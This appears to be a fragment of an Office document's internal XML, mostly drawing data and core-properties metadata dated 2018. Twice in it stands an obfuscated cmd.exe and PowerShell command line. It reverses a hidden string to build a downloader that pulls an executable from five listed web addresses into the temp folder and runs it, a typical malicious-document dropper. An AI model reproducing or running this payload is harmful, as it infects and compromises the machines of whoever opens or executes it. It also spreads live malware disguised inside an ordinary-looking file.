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7410" cy="1468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:\ZmXwNQfXwVVO\iMYHzLGt\zBkTArka\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set wO6i=;'Mwo'=wwv$}}{hctac}};kaerb;'zUj'=ptt$;nQu$ metI-ekovnI{ )00008 eg- htgnel.)nQu$ metI-teG(( fI;'pab'=urB$;)nQu$ ,pMC$(eliFdaolnwoD.fCm${yrt{)sBk$ ni pMC$(hcaerof;'exe.'+LRT$+'\'+pmet:vne$=nQu$;'atr'=ldh$;'664' = LRT$;'mhI'=BEN$;)'@'(tilpS.'2aHLZu6J/moc.tnayrbatinauoyevigrofi//:ptth@PV7AYlk9Hx/ur.84otvatakorp//:ptth@Tn8LXMyfM/moc.ppabojsupo//:ptth@HD8RZfE/moc.tropsruotneve//:ptth@xegIS17TTs/moc.dniretseuq.www//:ptth'=sBk$;tneilCbeW.teN tcejbo-wen=fCm$;'rnU'=YzO$&amp;&amp;for /L %D in (464,-1,0)do set Vwf=!Vwf!!wO6i:~%D,1!&amp;&amp;if %D leq 0 echo !Vwf:*Vwf!=! |powershell -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:\ZmXwNQfXwVVO\iMYHzLGt\zBkTArka\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set wO6i=;'Mwo'=wwv$}}{hctac}};kaerb;'zUj'=ptt$;nQu$ metI-ekovnI{ )00008 eg- htgnel.)nQu$ metI-teG(( fI;'pab'=urB$;)nQu$ ,pMC$(eliFdaolnwoD.fCm${yrt{)sBk$ ni pMC$(hcaerof;'exe.'+LRT$+'\'+pmet:vne$=nQu$;'atr'=ldh$;'664' = LRT$;'mhI'=BEN$;)'@'(tilpS.'2aHLZu6J/moc.tnayrbatinauoyevigrofi//:ptth@PV7AYlk9Hx/ur.84otvatakorp//:ptth@Tn8LXMyfM/moc.ppabojsupo//:ptth@HD8RZfE/moc.tropsruotneve//:ptth@xegIS17TTs/moc.dniretseuq.www//:ptth'=sBk$;tneilCbeW.teN tcejbo-wen=fCm$;'rnU'=YzO$&amp;&amp;for /L %D in (464,-1,0)do set Vwf=!Vwf!!wO6i:~%D,1!&amp;&amp;if %D leq 0 echo !Vwf:*Vwf!=! |powershell -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40:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-30T15:40:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>